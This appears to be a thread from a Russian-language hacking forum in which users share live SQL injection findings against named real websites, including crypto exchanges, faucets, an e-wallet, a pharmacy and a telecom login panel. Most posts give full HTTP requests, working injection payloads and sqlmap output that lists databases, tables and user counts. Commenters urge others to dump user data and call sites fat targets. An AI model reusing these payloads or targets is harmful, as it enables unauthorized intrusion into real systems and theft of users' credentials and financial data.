• XSS.stack #1 – первый литературный журнал от юзеров форума

Найденные интересеные SQL inj & XSS

Отслеживать
Пожалуйста, обратите внимание, что пользователь заблокирован
биржа зарегана в гонконге по отзывам вроде действуюшая

POST /launchpad-landing-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://tradedo.io/
Cookie: PHPSESSID=tq4847g6k9iiqu4d7s8e55bv32
Content-Length: 67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: tradedo.io
Connection: Keep-alive

searchTxt=1&type=all

Parameter: searchTxt (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: searchTxt=-9631' OR 5325=5325-- Etnr&type=all

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchTxt=1' AND (SELECT 8777 FROM (SELECT(SLEEP(5)))vjlA)-- efcl&type=all

Type: UNION query
Title: Generic UNION query (NULL) - 25 columns
Payload: searchTxt=1' UNION ALL SELECT NULL,CONCAT(0x7176717671,0x4e5145647a7549476864704267677376734866527975776c5357784c7362694d6d6e426676565751,0x71766b7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&type=all

available databases [2]:
[*] information_schema
[*] tradedo_live_exchange_2022

Database: tradedo_live_exchange_2022
[101 tables]
+----------------------------------+
| account_types |
| admin_controls |
| admin_controls_methods |
| admin_cron |
| admin_groups |
| admin_groups_pages |
| admin_groups_tabs |
| admin_ieo_listings |
| admin_image_sizes |
| admin_order |
| admin_pages |
| admin_sessions |
| admin_tabs |
| admin_transactions |
| admin_users |
| admin_wallet_bitcoin_transaction |
| api_keys |
| app_configuration |
| bank_accounts |
| bitcoin_addresses |
| bitcoin_addresses_log |
| bitcoind_log |
| block_tracker |
| bluktokensender |
| bnbaddresses |
| bnbtoken |
| bnbtransactions |
| bnbtransactions_log |
| buysell_blockchain_process |
| change_settings |
| chat |
| content |
| content_files |
| conversions |
| currencies |
| current_stats |
| daily_reports |
| deposits |
| emails |
| ethaddresses |
| ethereum_log |
| ethereum_txn |
| ethtoken |
| ethtransactions |
| ethtransactions_log |
| exchange |
| exchange_pairs |
| exchange_receive |
| fee_schedule |
| fees |
| historical_data |
| history |
| history_actions |
| ieo_purchased_history |
| ip_access_log |
| iso_countries |
| iso_countries_new |
| lang |
| lp_exchange_maket |
| lp_exchanges |
| market_data_cron |
| market_price_cron |
| mobile_app_banner |
| mobile_banner |
| monthly_reports |
| news |
| order_types |
| orders |
| passive_wallet |
| pcust_basecurrency_log |
| pcust_log |
| pcust_txn |
| permissions |
| receivelogs |
| request_descriptions |
| request_status |
| request_types |
| requests |
| sessions |
| settings |
| settings_files |
| site_users |
| site_users_access |
| site_users_balances |
| site_users_balances_trans |
| site_users_catch |
| site_users_ekyc |
| status |
| status_escrows |
| subject |
| swap |
| swap_pairs |
| test |
| trade_pairs |
| transaction_types |
| transactions |
| trazor_wallets |
| user_to_admin_logs |
| wallets |
| wallets_encrypt |
| zcron_log |
+----------------------------------+


есть еще старый домен кому нужно найдет там юзеров норм должно быть.пароли бкрипт вроде не помню уже.
 
Пожалуйста, обратите внимание, что пользователь заблокирован

FBX - Faucetbox

FBX - Faucetbox
faucetbox.io

POST /function.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: https://faucetbox.io/
Cookie: PHPSESSID=q8532u351bo54t7aqvf5ump6ci
Content-Length: 412
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: faucetbox.io
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="login_username"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="login_password"

g00dPa$$w0rD
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="acao"

log
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="acao"

log
------------YWJkMTQzNDcw--

available databases [2]:
[*] faucet_cassino
[*] information_schema


Database: faucet_cassino
[38 tables]
+--------------------+
| airdrop |
| banca |
| bandido |
| blacklist |
| bonus_lotery |
| boost |
| boost_faucet |
| boost_usuario |
| carteira |
| chat |
| faucet |
| faucet_hash |
| faucet_pagamento |
| faucet_pool |
| faucet_tempo |
| faucet_usuario |
| game_dice |
| game_lotery |
| grupo |
| historico_login |
| kwai |
| lotery |
| md5 |
| moeda |
| pix_usuario |
| poderes_usuario |
| pool |
| pool_premio |
| pool_usuario |
| requisicao_usuario |
| result_lotery |
| roleta_diaria |
| saldo_usuario |
| seguro |
| sorteio |
| tik |
| tokens_pool |
| usuario |
+--------------------+
 
Пожалуйста, обратите внимание, что пользователь заблокирован
beamstart.com

BEAMSTART - Global Entrepreneurship Community

Join the Global Community for Entrepreneurship. Receive exposure, support, and deals worth $100,000 that will accelerate your business and career growth.
beamstart.com beamstart.com



https://beamstart.com/API/v8.0/index.php?ip=1&system=common&type=ipcountry в мап суете и всеидет хорошо)



Parameter: ip (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ip=1') AND 8507=8507-- JsUv&system=common&type=ipcountry

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: ip=1');SELECT SLEEP(5)#&system=common&type=ipcountry

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ip=1') AND (SELECT 4442 FROM (SELECT(SLEEP(5)))GQqQ)-- CYXJ&system=common&type=ipcountry

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: ip=-2774') UNION ALL SELECT CONCAT(0x717a627871,0x6b507a4b5947614156574b564d6d4859774971656e4b64704c5155724253536167414f55556c7448,0x71767a6271)-- -&system=common&type=ipcountry
---
[22:50:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[22:51:02] [INFO] fetching database names
[22:51:06] [INFO] starting 9 threads
[22:51:07] [INFO] retrieved: 'performance_schema'
[22:51:08] [INFO] retrieved: 'innodb'
[22:51:08] [INFO] retrieved: 'beam'
[22:51:08] [INFO] retrieved: 'tmp'
[22:51:08] [INFO] retrieved: 'megplay'
[22:51:08] [INFO] retrieved: 'sendy'
[22:51:08] [INFO] retrieved: 'sys'
[22:51:08] [INFO] retrieved: 'information_schema'
[22:51:08] [INFO] retrieved: 'mysql'
available databases [9]:
[*] beam
[*] information_schema
[*] innodb
[*] megplay
[*] mysql
[*] performance_schema
[*] sendy
[*] sys
[*] tmp


в первой бд 71к юзеров тематика интересная денежная,инфо хватает.сливается быстро пароли средние по хешу.весь мат целка я не сливал.убивайте!
 
vally-hood сказал(а):
beamstart.com

BEAMSTART - Global Entrepreneurship Community

Join the Global Community for Entrepreneurship. Receive exposure, support, and deals worth $100,000 that will accelerate your business and career growth.
beamstart.com beamstart.com



https://beamstart.com/API/v8.0/index.php?ip=1&system=common&type=ipcountry в мап суете и всеидет хорошо)



Parameter: ip (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ip=1') AND 8507=8507-- JsUv&system=common&type=ipcountry

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: ip=1');SELECT SLEEP(5)#&system=common&type=ipcountry

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ip=1') AND (SELECT 4442 FROM (SELECT(SLEEP(5)))GQqQ)-- CYXJ&system=common&type=ipcountry

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: ip=-2774') UNION ALL SELECT CONCAT(0x717a627871,0x6b507a4b5947614156574b564d6d4859774971656e4b64704c5155724253536167414f55556c7448,0x71767a6271)-- -&system=common&type=ipcountry
---
[22:50:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[22:51:02] [INFO] fetching database names
[22:51:06] [INFO] starting 9 threads
[22:51:07] [INFO] retrieved: 'performance_schema'
[22:51:08] [INFO] retrieved: 'innodb'
[22:51:08] [INFO] retrieved: 'beam'
[22:51:08] [INFO] retrieved: 'tmp'
[22:51:08] [INFO] retrieved: 'megplay'
[22:51:08] [INFO] retrieved: 'sendy'
[22:51:08] [INFO] retrieved: 'sys'
[22:51:08] [INFO] retrieved: 'information_schema'
[22:51:08] [INFO] retrieved: 'mysql'
available databases [9]:
[*] beam
[*] information_schema
[*] innodb
[*] megplay
[*] mysql
[*] performance_schema
[*] sendy
[*] sys
[*] tmp


в первой бд 71к юзеров тематика интересная денежная,инфо хватает.сливается быстро пароли средние по хешу.весь мат целка я не сливал.убивайте!
Там ещё 272к строк с юзерами в sendy:) таргет жирнючий
 
Пожалуйста, обратите внимание, что пользователь заблокирован


Parameter: #1* (URI)
Type: error-based
Title: PostgreSQL error-based - Parameter replace
Payload: http://arbi-coin.com:80/main/m_boar...(118)||CHR(112)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (2226=2226) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(98)||CHR(112)||CHR(113)) AS NUMERIC))&page=3
---
[12:23:23] [INFO] the back-end DBMS is PostgreSQL
web application technology: Nginx, PHP, PHP 7.0.33
back-end DBMS: PostgreSQL
[12:23:23] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[12:23:23] [INFO] fetching database (schema) names
[12:23:23] [INFO] starting 10 threads
available databases [5]:
[*] arbigold
[*] arbischema
[*] cron
[*] information_schema
[*] pg_catalog
 
cryptobirge.com

Parameter: forgot_email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: forgot_email=1' AND (SELECT 6158 FROM (SELECT(SLEEP(5)))EdEL) AND 'xTwv'='xTwv&user_id=1
---
back-end DBMS: MySQL >= 5.0.12

available databases [6]:
[*] exchange
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] sys

Database: exchange
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| t_users_logs | 129395 |
| t_messages_chat | 72774 |
| t_withdraw | 7030 |
| t_support | 5766 |
| t_users | 4492 |
| t_users_balance | 4397 |
| t_payments | 4285 |
| t_deposit_addreses | 3652 |
| t_options_bet | 1195 |
| t_tg_hook | 931 |
| t_fake_users | 566 |
| t_staking | 199 |
| t_spammer_wallet | 182 |
| t_verify | 95 |
| t_fake_msg | 60 |
| t_chat | 53 |
| t_spammer_min_dep | 51 |
| t_promocode | 39 |
| t_trans | 35 |
| t_spammer_domains | 28 |
| t_site_course | 23 |
| t_alert_message | 19 |
| t_spammer_msg_temp | 18 |
| t_config | 1 |
| t_course | 1 |
| t_messages_settings | 1 |
| t_terms | 1 |
+---------------------+---------+


POST /FORGOT-PASSWORD-ONE HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://cryptobirge.com/
Cookie: PHPSESSID=5jdnolk0o2l8633dj5fic974qv
Content-Length: 71
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Host: cryptobirge.com
Connection: Keep-alive

forgot_email=1&user_id=1
 
Пожалуйста, обратите внимание, что пользователь заблокирован

Log on e-Wallet | TEMPLESYC WALLET FUNDING

vwallet.ng vwallet.ng

POST /requests/send_rlink.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://vwallet.ng/
Cookie: PHPSESSID=2128uj48571dhjtmhmt7jroslr
Content-Length: 50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: vwallet.ng
Connection: Keep-alive

&em=1

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: em (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: &em=1' OR NOT 6804=6804-- WcYz

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: &em=1' AND GTID_SUBSET(CONCAT(0x716b767671,(SELECT (ELT(7135=7135,1))),0x71627a7a71),7135)-- baxT

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: &em=1';SELECT SLEEP(5)#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: &em=1' AND (SELECT 3835 FROM (SELECT(SLEEP(5)))VTqI)-- epvr
---
[01:06:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Nginx, PHP 7.3.27, Plesk
back-end DBMS: MySQL >= 5.6
[01:06:56] [INFO] fetching database names
[01:06:56] [INFO] starting 2 threads
[01:06:56] [INFO] resumed: 'information_schema'
[01:06:56] [INFO] resumed: 'vwallet_2022'
available databases [2]:
[*] information_schema
[*] vwallet_2022

[01:06:56] [INFO] fetching tables for database: 'vwallet_2022'
[01:06:57] [INFO] starting 10 threads
[01:06:58] [INFO] retrieved: 'payment_types'
[01:06:59] [INFO] retrieved: 'funds_tbl'
[01:06:59] [INFO] retrieved: 'rrr_tbl'
[01:06:59] [INFO] retrieved: 'settings'
[01:06:59] [INFO] retrieved: 'acct_setup'
[01:06:59] [INFO] retrieved: 'split_tbl'
[01:06:59] [INFO] retrieved: 'param_tbl'
[01:06:59] [INFO] retrieved: 'merchants_tbl'
[01:06:59] [INFO] retrieved: 'roles'
[01:06:59] [INFO] retrieved: 'logs_tbl'
[01:06:59] [INFO] retrieved: 'trans_category'
[01:07:00] [INFO] retrieved: 'transactions_tbl'
[01:07:00] [INFO] retrieved: 'users_tbl'
Database: vwallet_2022
[13 tables]
+------------------+
| acct_setup |
| funds_tbl |
| logs_tbl |
| merchants_tbl |
| param_tbl |
| payment_types |
| roles |
| rrr_tbl |
| settings |
| split_tbl |
| trans_category |
| transactions_tbl |
| users_tbl |
+------------------+
 
paidtap.com


Parameter: reset_pass (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: reset_pass=0' AND (SELECT 8130 FROM (SELECT(SLEEP(5)))IdlK) AND 'BzHG'='BzHG
---

available databases [2]:
[*] dbgpgz6yhqmpow
[*] information_schema

Database: dbgpgz6yhqmpow
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| test | 400734 |
| faucet_claims | 271917 |
| system_income | 254324 |
| completed_offers | 254302 |
| faucet_initiation | 227082 |
| ip_checks | 136755 |
| highlow_history | 104068 |
| user_logins | 98840 |
| ips_historys | 60170 |
| mining_pay_history | 42444 |
| shortlinks_done | 29379 |
| users | 27186 |
| users_sessions | 25996 |
| notifications | 25585 |
| CT_game_claim | 18578 |
| withdrawals | 16215 |
| ref_commissions | 14244 |
| purchased_referrals | 8467 |
| users_offers | 5534 |
| CT_game_hash | 4346 |
| bitcoin_investments | 3961 |
| ptc_done | 2722 |
| mining_claim_history | 2179 |
| deposits | 1572 |
| daily_income | 1490 |
| coins_value | 1443 |
| bitcoin_price | 1433 |
| tickets_messages | 1108 |
| bots_ref | 1063 |
| gems_history | 1058 |
| block_reasons | 865 |
| history_daily_production_bots_ref | 853 |
| mining_history_cron | 831 |
| user_transactions | 829 |
| reg_reset_pass | 752 |
| jobs_done | 527 |
| tickets_support | 466 |
| mining_buy_history | 334 |
| prueba | 261 |
| clone_wallets | 244 |
| list_countries | 215 |
| airtm_transactions | 190 |
| users_deleted | 170 |
| site_config | 158 |
| faucet_history | 147 |
| perfectmoney_transactions | 147 |
| activity_rewards_claims | 141 |
| lottery_tickets | 120 |
| ptc_websites | 106 |
| mining_machine | 104 |
| purchase_pre_ref_history | 101 |
| history_buy_bot_ref | 85 |
| CT_config | 82 |
| notes_reasons | 69 |
| ban_reasons | 65 |
| whitelist | 64 |
| admin_warnings_notifications | 42 |
| offerwall_config | 40 |
| ad_codes | 36 |
| shortlinks_config | 29 |
| approved_email_domains | 23 |
| referral_contest | 22 |
| shortlinks_contest | 22 |
| tasks_contest | 22 |
| lottery | 21 |
| banners | 20 |
| user_max_witdraw_allow | 20 |
| ptc_sessions | 19 |
| offers_reqs | 17 |
| activity_rewards | 11 |
| individual_notify | 11 |
| levels | 9 |
| ad_packs | 8 |
| faq | 7 |
| ptc_packs | 7 |
| faq_mining | 6 |
| faucet | 6 |
| levels_admin | 6 |
| global_notify | 4 |
| jobs | 4 |
| memberships | 4 |
| tickets_category | 3 |
| CT_modules | 2 |
| announcement | 1 |
| config_buy_ref_bot | 1 |
| plantillas | 1 |
+-----------------------------------+---------+

POST /market.html HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://paidtap.com/
Cookie: PHPSESSID=eebda17542aafa42560cd6d8908ca50e; _data_cpc=4-1-1665312704
Content-Length: 133
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Host: paidtap.com
Connection: Keep-alive

reset_pass=0
 
bitspadex.com

Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=LOGIN&email=0' AND (SELECT 8550 FROM (SELECT(SLEEP(5)))IBGi) AND 'RVIm'='RVIm&password=u]H[ww6KrA9F.x-F
---

available databases [6]:
[*] trading_konri
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] sys

Database: trading_konri
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| t_users_logs | 515515 |
| t_support | 57185 |
| t_transactions_history | 23385 |
| t_auth_logs | 16876 |
| t_users_balance | 4807 |
| t_users | 4291 |
| t_exchange_history | 4038 |
| t_transfer_history | 3181 |
| t_trading_orders | 1377 |
| t_autodep_logs | 685 |
| t_users_staking | 261 |
| t_users_ref | 203 |
| t_alert_message | 183 |
| t_trading_graphic | 168 |
| t_spammer_msg_temp | 100 |
| t_spammer_config | 96 |
| t_spammer_promocode | 88 |
| t_spammer_domains | 69 |
| t_spammer_courses | 48 |
| t_dep_currency | 23 |
| t_site_currency | 21 |
| t_site_staking | 19 |
| t_trading_courses | 19 |
| t_users_ref_payout | 13 |
| t_currency_price | 1 |
| t_site_config | 1 |
+------------------------+---------+

POST /ajax/function.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://bitspadex.com/
Cookie: PHPSESSID=cfcvj9k4sera37ithkue4ahp79
Content-Length: 91
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Host: bitspadex.com
Connection: Keep-alive

action=LOGIN&email=0&password=u]H[ww6KrA9F.x-F
 
Код: 
POST /ajax/read-product.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.dzenpharmacy.com/cart.php
Cookie: PHPSESSID=0e6967691079860252c6acab0b06a4a6; googtrans=/en/af; googtrans=/en/af
Content-Length: 68
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Host: www.dzenpharmacy.com
Connection: Keep-alive

skeywords=the%25'%20AND%203*3*9<(2*4)%20AND%20'000I0nZ'!='000I0nZ%25
 
POST /auth/login HTTP/1.1
Host: panel.telekom.pl
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: https://panel.telekom.pl/auth
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Cookie: PHPSESSID=2h6m2ulk1dfh0cigur9d6i93g0

username=zWayxGeB'&password=p7G%21i2v%21X4&btn_save=Zaloguj
 
Код: 
GET /catalog.php?podcategory=64%20OR%2017-7%3d10 HTTP/1.1
Host: ggresel.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: https://ggresel.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Если нельзя постить трагеты с рушными корнями, то не баньте, исправлюсь.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
dabdab сказал(а):
Код: 
GET /catalog.php?podcategory=64%20OR%2017-7%3d10 HTTP/1.1
Host: ggresel.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: https://ggresel.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Если нельзя постить трагеты с рушными корнями, то не баньте, исправлюсь.
Ну чё пацаны, украдём кс го прайм XD
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=naAL' AND (SELECT 5786 FROM (SELECT(SLEEP(5)))kLtL) AND 'FGjB'='FGjB&password=&submit.x=1&submit.y=1


available databases [18]:
[*] bcg
[*] bcg_archive_database
[*] bcg_automation_process_log
[*] bcg_central_regions
[*] bcg_data_imports
[*] bcg_ec_jobs
[*] bcg_employer_activities_log
[*] bcg_resumeparser
[*] bcg_sitesearch
[*] exim
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] phpmytop
[*] sc_manual_jobs
[*] sys
[*] url_checker

Law Firm News, Law Firm Ratings, Law Firm Rankings, Legal Gossip, Law Job Forums, Law Firm Salaries, Legal Discussion, Legal News - Judged

Judged is a Legal Discussion Forums, Law Firm Salaries, Law Firm Ratings, Law Firm Rankings, Legal Gossip, Law Firm News, Legal News, Law Job Forums, Legal Firm Salaries, Legal Discussion Board, General Discussion Board, Legal Chat Forums, Salary Survey
www.judged.com
Parameter: listid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: listid=340' AND 5148=5148 AND 'jbAq'='jbAq&returl=1

available databases [4]:
[*] information_schema
[*] judged
[*] judged_temp
[*] test

Parameter: username (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=AXsJ' RLIKE (SELECT (CASE WHEN (7163=7163) THEN 0x4158734a ELSE 0x28 END))-- HEFZ&password=&Sign-In=Sign-In

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: username=AXsJ' AND GTID_SUBSET(CONCAT(0x71706a6b71,(SELECT (ELT(1481=1481,1))),0x7171787171),1481)-- oxAP&password=&Sign-In=Sign-In


available databases [2]:
[*] dashapp
[*] information_schema
 
Пожалуйста, обратите внимание, что пользователь заблокирован
жмоты)

POST /retrievePassword HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: https://bitbotster.com/ Cookie: BBSlanguage=zh; BBSsession=s%3AaJIG1iAsq2J51bMNiJ_O5F4leUESG_ro.DXRwvQp7hO4g6VwVTfh27f45bQE3dWysRH8QfIuwKO0; __cf_bm=GQqf9jM8ZqJDKvTJbVoMkKdIldNhQ.ir0PiE15D1yCo-1669228143-0-AXUaDYuYe7rlkaVHdQIzf46ThgsBDEIwt8YbGcusqYX4kxKM9eWjl5uysDL/uAkwXsgvhqTOJJ7uDl+/OmrXLe6MDUv1TDThKyMDKfL9w2CTuupCeCP6vK1y6jUZwvP4HZL0vC0VwNhyO5GbxcHcGUE=; cf_use_ob=0; BBScookieInfo=1 Content-Length: 71 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36 Host: bitbotster.com Connection: Keep-alive email=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z&from=2&submit=SEND


Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=1' AND (SELECT 2881 FROM (SELECT(SLEEP(5)))fAgy) AND 'oEyp' LIKE 'oEyp&from=2&submit=SEND

Parameter: email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: email=1' AND 4168=(SELECT (CASE WHEN (4168=4168) THEN 4168 ELSE (SELECT 8616 UNION SELECT 8413) END))-- REiX&from=2&submit=SEND


[*] acc_main
[*] information_schema

Database: acc_main
[4 tables]
+------------------------+
| bbs_accessibles |
| bbs_fintx_coinpayments |
| bbs_fintx_paypal |
| bbs_users |
+------------------------+

Database: acc_main
Table: bbs_users
[36 columns]
+--------------+--------------------------------------------------+
| Column | Type |
+--------------+--------------------------------------------------+
| created | timestamp(3) |
| laLogin | timestamp(3) |
| lan | varchar(2) |
| paid | timestamp(3) |
| plan | enum('trial','beginner','botmaster','protrader') |
| pvLogin | timestamp(3) |
| revAval | int |
| revGlobal | int |
| revTotl | int |
| revUsed | int |
| stratMgr_lev | int unsigned |
| stratMgr_sym | varchar(16) |
| stratMgr_tf | int unsigned |
| stratsMY | json |
| stratsREV | json |
| theme | varchar(2) |
| totlLogins | int unsigned |
| twofa | enum('email','device') |
| twofaKey | varchar(32) |
| txAval | int |
| txGlobal | int |
| txTotl | int |
| txUsed | int |
| uem | varchar(128) |
| uid | char(36) |
| uips | json |
| ulvl | enum('user','vip','finance','admin','marketing') |
| unm | varchar(32) |
| upw | varchar(255) |
| upwReset | varchar(128) |
| usr | int unsigned |
| utz | decimal(4,1) |
| volAval | decimal(24,2) |
| volGlobal | decimal(32,2) |
| volTotl | decimal(24,2) |
| volUsed | decimal(24,2) |
+--------------+---------

иногда висит клауд,но они рукажопы и он так же работает.

админа оповестил он клиентов клал болт,так что делайте что хотите )
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Some labs and health companies, not for me...

Store

The place to find all the exclusive products.
www.mybtbackoffice.com

Parameter: sponsorid (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: Pkg=99&NXR=Y&sponsorid=';WAITFOR DELAY '0:0:5'--&productid=IXQ4CE
---
[09:43:03] [INFO] testing Microsoft SQL Server
[09:43:03] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[09:43:38] [INFO] confirming Microsoft SQL Serverr DBMS delay responses (option '--time-sec')? [Y/n]
[09:43:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2019 or 10 or 2016
web application technology: Microsoft IIS 10.0, ASP.NET
back-end DBMS: Microsoft SQL Server 2017

available databases [63]:
[*] PerfectHealthLife
[*] AmericanDream
[*] ATG
[*] Atteva
[*] Calerie
[*] CalorNFT
[*] CareBeyond
[*] CareBeyond_TEST
[*] CCG
[*] CelVitali
[*] DreamTree
[*] Entrenet
[*] EpicTrading
[*] ET
[*] EXSTC
[*] FitnessAge
[*] FullSend
[*] FutureX
[*] GBX
[*] GiftsUnderSea
[*] GPA
[*] GreenOrganics
[*] GSI
[*] HelixLife
[*] HempPower
[*] Hulsa
[*] Infinite
[*] KinlocksTax
[*] LeafyWell
[*] LGRX
[*] ListenChannel
[*] LOVEco
[*] LSPHealthyLiving
[*] M3
[*] master
[*] Millennium
[*] model
[*] msdb
[*] MyGoCards
[*] MyTruGlobal
[*] NanoWorx
[*] NaturesFrequencies
[*] NuLife
[*] Nutronix
[*] PYUR
[*] Quicksilver
[*] Reach
[*] SYM
[*] tempdb
[*] TGD
[*] TheBettorsEdge
[*] TierraScience
[*] UNEEK
[*] USACV
[*] UTS
[*] UWC
[*] VGWellness
[*] VirusesX
[*] WealthStackers
[*] Wildtree
[*] XHL
[*] XtremeGreen
[*] ࠁerzei
 
bitxola.com

Parameter: email (POST)
Type: time-based blind
